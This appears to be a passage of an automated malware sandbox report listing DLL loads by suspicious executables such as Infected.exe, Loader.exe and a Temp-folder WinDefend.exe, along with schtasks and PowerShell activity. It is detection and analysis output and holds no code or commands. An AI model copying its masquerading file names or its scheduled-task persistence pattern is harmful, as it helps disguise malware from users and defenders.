Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
